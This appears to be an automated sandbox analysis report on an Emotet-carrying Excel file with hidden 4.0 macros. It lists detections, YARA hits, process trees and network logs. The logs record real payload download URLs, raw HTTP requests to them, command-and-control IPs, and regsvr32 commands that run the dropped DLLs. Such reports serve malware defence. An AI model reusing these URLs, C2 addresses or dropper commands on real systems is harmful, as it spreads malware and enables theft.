Windows Analysis Report
documentazione 68668.xls

Overview

General Information

Sample Name: documentazione 68668.xls
Analysis ID: 679676
MD5: a4c856aa217eab1f66dfade13f701013
SHA1: c4bd8e7e5cbb3e8038186851e7eb9ee65007c64d
SHA256: 51737c16eed7b848b37b843555c7bda5ead1f418fbadb8def452d287d0817179
Infos:

Detection

Hidden Macro 4.0, Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Antivirus / Scanner detection for submitted sample
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Office process drops PE file
Found Excel 4.0 Macro with suspicious formulas
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Registers a DLL
PE file contains more sections than normal
Drops PE files to the user directory
Dropped file seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 2996 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • regsvr32.exe (PID: 1952 cmdline: C:\Windows\System32\regsvr32.exe /S ..\wdusx1.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1472 cmdline: C:\Windows\System32\regsvr32.exe /S ..\wdusx2.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 1200 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\LxvynAbdjmnUIIL\BlVTVcJlqYTKwC.dll" MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1980 cmdline: C:\Windows\System32\regsvr32.exe /S ..\wdusx3.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • svchost.exe (PID: 2104 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: C78655BC80301D76ED4FEF1C1EA40A7D)
  • cleanup
Source | Rule | Description | Author | Strings
documentazione 68668.xls | SUSP_Excel4Macro_AutoOpen | Detects Excel4 macro use with auto open / close | John Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x96aa:$s1: Excel
  • 0xa759:$s1: Excel
  • 0x35d4:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
Source | Rule | Description | Author | Strings
C:\Users\user\Desktop\documentazione 68668.xls | SUSP_Excel4Macro_AutoOpen | Detects Excel4 macro use with auto open / close | John Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x96aa:$s1: Excel
  • 0xa759:$s1: Excel
  • 0x35d4:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
Source | Rule | Description | Author | Strings
00000007.00000002.1196956196.00000000003AA000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Emotet_3 |  | Joe Security
00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp | Windows_Trojan_Emotet_db7d33fa | unknown | unknown
00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp | Windows_Trojan_Emotet_d6ac1ea4 | unknown | unknown
00000007.00000002.1197465713.0000000180001000.00000020.00001000.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security

Source | Rule | Description | Author | Strings
7.2.regsvr32.exe.140000.0.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
6.2.regsvr32.exe.4b0000.0.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
7.2.regsvr32.exe.140000.0.unpack | Windows_Trojan_Emotet_db7d33fa | unknown | unknown
7.2.regsvr32.exe.140000.0.unpack | Windows_Trojan_Emotet_d6ac1ea4 | unknown | unknown
6.2.regsvr32.exe.4b0000.0.unpack | Windows_Trojan_Emotet_db7d33fa | unknown | unknown
No Sigma rule has matched
Timestamp: 08/06/22-09:20:53.106547
Source IP: 192.168.2.22
Destination IP: 198.199.70.22
SID: 2404322
Source Port: 49177
Destination Port: 8080
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: documentazione 68668.xls | Virustotal: Detection: 55%
Source: documentazione 68668.xls | Metadefender: Detection: 37%
Source: documentazione 68668.xls | ReversingLabs: Detection: 73%
Source: documentazione 68668.xls | Avira: detected
Source: http://kronostr.com/tr/68yHRhfuU7Qj/ | Avira URL Cloud: Label: malware
Source: https://www.zardamarine.com/images/psQbAjrrEOXWPrS/ | Avira URL Cloud: Label: malware
Source: http://labfitouts.com/cgi-bin/Rea3Iu3wGvgAbTset0/ | Avira URL Cloud: Label: malware
Source: https://198.199.70.22/B | Avira URL Cloud: Label: malware
Source: https://165.22.254.68/O | Avira URL Cloud: Label: malware
Source: https://198.199.70.22/080/F | Avira URL Cloud: Label: malware
Source: https://198.199.70.22:8080/e | Avira URL Cloud: Label: malware
Source: https://198.199.70.22:8080/a | Avira URL Cloud: Label: malware
Source: zardamarine.com | Virustotal: Detection: 10%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\UVvnppK[1].dll | Avira: detection malicious, Label: TR/Crypt.Agent.hwpwp
Source: C:\Users\user\wdusx2.ocx | Avira: detection malicious, Label: TR/Crypt.Agent.hwpwp
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\UVvnppK[1].dll | Metadefender: Detection: 40%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\UVvnppK[1].dll | ReversingLabs: Detection: 88%
Source: C:\Users\user\wdusx2.ocx | Metadefender: Detection: 40%
Source: C:\Users\user\wdusx2.ocx | ReversingLabs: Detection: 88%
Source: C:\Windows\System32\LxvynAbdjmnUIIL\BlVTVcJlqYTKwC.dll (copy) | Metadefender: Detection: 40%
Source: C:\Windows\System32\LxvynAbdjmnUIIL\BlVTVcJlqYTKwC.dll (copy) | ReversingLabs: Detection: 88%
Source: 00000007.00000002.1196956196.00000000003AA000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Emotet
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown | HTTPS traffic detected: 208.67.23.91:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: C:\Windows\System32\regsvr32.exe | Code function: 7_2_000000018000C3D8 FindNextFileW,FindFirstFileW,7_2_000000018000C3D8

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: UVvnppK[1].dll.0.dr
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\UVvnppK[1].dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Source: global traffic | DNS query: name: www.zardamarine.com
Source: global traffic | DNS query: name: kronostr.com
Source: global traffic | DNS query: name: labfitouts.com
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 208.67.23.91:443 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 208.67.23.91:443 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 208.67.23.91:443 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 208.67.23.91:443 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 208.67.23.91:443 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 208.67.23.91:443 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 208.67.23.91:443 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 208.67.23.91:443 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 208.67.23.91:443 -> 192.168.2.22:49171
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 188.132.217.108:80 -> 192.168.2.22:49172
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 165.22.254.68:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 165.22.254.68:443
            Source: global trafficTCP traffic: 192.168.2.22:49174 -> 165.22.254.68:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 165.22.254.68:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 165.22.254.68:443
            Source: global trafficTCP traffic: 192.168.2.22:49175 -> 165.22.254.68:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 165.22.254.68:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 165.22.254.68:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 165.22.254.68:443
            Source: global trafficTCP traffic: 192.168.2.22:49176 -> 165.22.254.68:443
            Source: global trafficTCP traffic: 192.168.2.22:49171 -> 208.67.23.91:443
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 188.132.217.108:80
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 66.96.149.19:80

            Networking

            Source: C:\Windows\System32\regsvr32.exe Network Connect: 165.22.254.68 443
            Source: C:\Windows\System32\regsvr32.exe Network Connect: 198.199.70.22 8080
            Source: Traffic Snort IDS: 2404322 ET CNC Feodo Tracker Reported CnC Server TCP group 12 192.168.2.22:49177 -> 198.199.70.22:8080
            Source: Joe Sandbox View ASN Name: DIGITALOCEAN-ASNUS
            Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
            Source: Joe Sandbox View IP Address: 157.245.111.0
            Source: Joe Sandbox View IP Address: 157.230.99.206
            Source: global traffic HTTP traffic detected:
                HTTP/1.1 200 OK
                Server: nginx
                Date: Sat, 06 Aug 2022 07:20:16 GMT
                Content-Type: application/x-msdownload
                Content-Length: 661504
                Connection: keep-alive
                X-Powered-By: PHP/7.1.33
                Cache-Control: no-cache, must-revalidate
                Pragma: no-cache
                Expires: Sat, 06 Aug 2022 07:20:16 GMT
                Content-Disposition: attachment; filename="UVvnppK.dll"
                Content-Transfer-Encoding: binary
                Set-Cookie: 62ee1630cc8c8=1659770416; expires=Sat, 06-Aug-2022 07:21:16 GMT; Max-Age=60; path=/
                Last-Modified: Sat, 06 Aug 2022 07:20:16 GMT
                X-Powered-By: PleskLin
            Source: global traffic HTTP traffic detected:
                GET /images/psQbAjrrEOXWPrS/ HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: www.zardamarine.com
                Connection: Keep-Alive
            Source: global traffic HTTP traffic detected:
                GET /tr/68yHRhfuU7Qj/ HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: kronostr.com
                Connection: Keep-Alive
            Source: global traffic HTTP traffic detected:
                GET /cgi-bin/Rea3Iu3wGvgAbTset0/ HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: labfitouts.com
                Connection: Keep-Alive
            Source: global traffic TCP traffic: 192.168.2.22:49177 -> 198.199.70.22:8080
            Source: unknown Network traffic detected: IP country count 17
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49176
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49175
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49174
            Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49171
            Source: unknown Network traffic detected: HTTP traffic on port 49175 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49171 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49176 -> 443
            Source: unknown Network traffic detected: HTTP traffic on port 49174 -> 443
            Source: global traffic HTTP traffic detected:
                HTTP/1.1 404 Not Found
                Server: nginx
                Date: Sat, 06 Aug 2022 07:20:17 GMT
                Content-Type: text/html
                Content-Length: 961
                Connection: close
                Last-Modified: Wed, 04 Jan 2017 19:07:47 GMT
                ETag: "2a8f73-3c1-54549800fc6c0"
                Accept-Ranges: bytes
            Source: unknown TCP traffic detected without corresponding DNS query: 165.22.254.68
            Source: unknown TCP traffic detected without corresponding DNS query: 198.199.70.22
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\UVvnppK[1].dll
            Source: unknown DNS traffic detected: queries for: www.zardamarine.com
            Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180005610 InternetReadFile,7_2_0000000180005610
            Source: unknown HTTPS traffic detected: 208.67.23.91:443 -> 192.168.2.22:49171 version: TLS 1.2

            E-Banking Fraud

            Source: Yara match File source: 00000007.00000002.1196956196.00000000003AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 7.2.regsvr32.exe.140000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 6.2.regsvr32.exe.4b0000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 6.2.regsvr32.exe.4b0000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 7.2.regsvr32.exe.140000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000007.00000002.1197465713.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000006.00000002.924980552.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000007.00000002.1196882539.0000000000140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 7.2.regsvr32.exe.140000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Emotet_db7d33fa Author: unknown
            Source: 7.2.regsvr32.exe.140000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Emotet_d6ac1ea4 Author: unknown
            Source: 6.2.regsvr32.exe.4b0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Emotet_db7d33fa Author: unknown
            Source: 6.2.regsvr32.exe.4b0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Emotet_d6ac1ea4 Author: unknown
            Source: 6.2.regsvr32.exe.4b0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Emotet_db7d33fa Author: unknown
            Source: 6.2.regsvr32.exe.4b0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Emotet_d6ac1ea4 Author: unknown
            Source: 7.2.regsvr32.exe.140000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Emotet_db7d33fa Author: unknown
            Source: 7.2.regsvr32.exe.140000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Emotet_d6ac1ea4 Author: unknown
            Source: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Emotet_db7d33fa Author: unknown
            Source: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Emotet_d6ac1ea4 Author: unknown
            Source: 00000007.00000002.1197465713.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Emotet_db7d33fa Author: unknown
            Source: 00000007.00000002.1197465713.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Emotet_d6ac1ea4 Author: unknown
            Source: 00000006.00000002.924980552.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Emotet_db7d33fa Author: unknown
            Source: 00000006.00000002.924980552.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Emotet_d6ac1ea4 Author: unknown
            Source: 00000007.00000002.1196882539.0000000000140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Emotet_db7d33fa Author: unknown
            Source: 00000007.00000002.1196882539.0000000000140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Emotet_d6ac1ea4 Author: unknown
            Source: Screenshot number: 4 Screenshot OCR: Enable Editing and click Enable Content.
            Source: Screenshot number: 4 Screenshot OCR: Enable Content.
            Source: Screenshot number: 8 Screenshot OCR: Enable Editing and click Enable Content.
            Source: Screenshot number: 8 Screenshot OCR: Enable Content.
            Source: Document image extraction number: 0 Screenshot OCR: Enable Editing and click Enable Content.
            Source: Document image extraction number: 0 Screenshot OCR: Enable Content.
            Source: Document image extraction number: 1 Screenshot OCR: Enable Editing and click Enable Content.
            Source: Document image extraction number: 1 Screenshot OCR: Enable Content.
            Source: documentazione 68668.xls Macro extractor: Sheet: PKEKPPGEKKPGE contains: URLDownloadToFileA
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\UVvnppK[1].dll
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\wdusx2.ocx
            Source: documentazione 68668.xls Initial sample: EXEC
            Source: documentazione 68668.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
            Source: 7.2.regsvr32.exe.140000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Emotet_db7d33fa reference_sample = 08c23400ff546db41f9ddbbb19fa75519826744dde3b3afb38f3985266577afc, os = windows, severity = x86, creation_date = 2022-05-09, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = eac196154ab1ad636654c966e860dcd5763c50d7b8221dbbc7769c879daf02fd, id = db7d33fa-e50c-4c59-ab92-edb74aac87c9, last_modified = 2022-06-09
            Source: 7.2.regsvr32.exe.140000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Emotet_d6ac1ea4 reference_sample = 2c6709d5d2e891d1ce26fdb4021599ac10fea93c7773f5c00bea8e5e90404b71, os = windows, severity = x86, creation_date = 2022-05-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Emotet, fingerprint = 7e6224c58c283765b5e819eb46814c556ae6b7b5931cd1e3e19ca3ec8fa31aa2, id = d6ac1ea4-b0a8-4023-b712-9f4f2c7146a3, last_modified = 2022-06-09
